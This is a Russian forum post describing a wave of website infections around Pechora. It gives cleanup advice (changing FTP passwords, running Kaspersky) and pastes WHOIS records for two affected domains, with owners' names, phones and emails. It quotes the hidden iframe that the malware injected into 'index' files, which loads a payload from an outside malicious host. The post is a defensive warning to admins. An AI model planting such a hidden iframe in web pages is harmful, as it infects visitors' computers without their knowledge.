Хост у сайтов разный, поэтому заражены не с одного хостинга. Такая волна недавно прокатилась по интернету и хостам. Сам боролся.... Помогает срочная смена пароля доступа по FTP и "Касперыч" очень хорошо чистит админские машины. В моем случае вирус поражал только файлы имеющие в своем имени "index".
Вот код, который вставлялся в файлы "index" вирусом:
Код:
<iframe src="http://thebettings.cn:8080/ts/in.cgi?pepsi54" width=125 height=125 style="visibility: hidden"></iframe>
Если бы админы сайтов глянули на этот код, то можно было бы сразу сказать диагноз.
При посещении зараженных сайтов вирус автоматом "просится" в компьютер пользователя. Будьте внимательны и осторожны.Данные по хостингу Печорских "заболевших" сайтов:Информация о домене PECHORAONLINE.RU Доменное имя pechoraonline.ru
% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use
%
http://www.ripn.net/about/servpol.html#3.2 (in Russian)
%
http://www.ripn.net/about/en/servpol.html#3.2 (in English).
domain: PECHORAONLINE.RU
type: CORPORATE
nserver: ns1.mchost.ru.
nserver: ns2.mchost.ru.state: REGISTERED, DELEGATED
person:
Sergei V Vasichevphone: +7 908 7162143
fax-no: +7 908 7162143
e-mail:
domains@mchost.rue-mail:
sergey@vasichev.ruregistrar: REGTIME-REG-RIPN
created: 2007.02.16
paid-till: 2010.02.16
source: TC-RIPN
Информация о домене VOLNA-PLUS.RU Доменное имя volna-plus.ru
% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
%
http://www.ripn.net/about/servpol.html#3.2 (in Russian)
%
http://www.ripn.net/about/en/servpol.html#3.2 (in English).
domain: VOLNA-PLUS.RU
type: CORPORATE
nserver: ns2.parma.ru.
nserver: srv.pokomi.ru.state: REGISTERED, DELEGATED
org:
Volna Ltdphone: +7 82142 35690
e-mail:
pechora-2000@rambler.ruregistrar: RUCENTER-REG-RIPN
created: 2008.06.20
paid-till: 2010.06.20
source: TC-RIPN